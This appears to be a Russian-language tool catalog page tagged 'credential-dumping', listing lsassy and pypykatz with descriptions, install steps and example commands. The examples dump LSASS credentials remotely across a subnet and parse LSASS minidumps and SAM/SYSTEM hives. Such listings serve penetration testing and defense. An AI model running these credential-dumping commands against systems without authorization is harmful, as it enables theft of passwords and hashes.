Каталог инструментов

2 инструментов

Тег: credential-dumping ×

lsassy

v3.1.16
Password Attacks

Удалённое извлечение учётных данных из LSASS без агента: использует WMI/COM через impacket для чтения памяти процесса и pypykatz для парсинга, нативно интегрируется как модуль NetExec.

# pip pip install lsassy # Из исходников git clone https://github.com/Hackndo/lsassy cd lsassy && pip install -e . # Пример: дамп учётных данных lsassy -d domain.local -u admin -p 'Password123' 192.168.1.0/24 # Интеграция с CrackMapExec nxc smb 192.168.1.0/24 -u admin -p 'Password123' -M lsassy

pypykatz

v0.6.13
Password Attacks

Реализация Mimikatz на чистом Python без нативных зависимостей: работает на Linux, Mac и Windows; извлекает учётные данные из дампов LSASS, реестровых кустов SAM/SECURITY/SYSTEM и файлов DPAPI.

# pip pip install pypykatz # pipx pipx install pypykatz # Пример: разбор LSASS дампа pypykatz lsa minidump lsass.dmp # Пример: offline SAM/SYSTEM pypykatz registry --sam SAM SYSTEM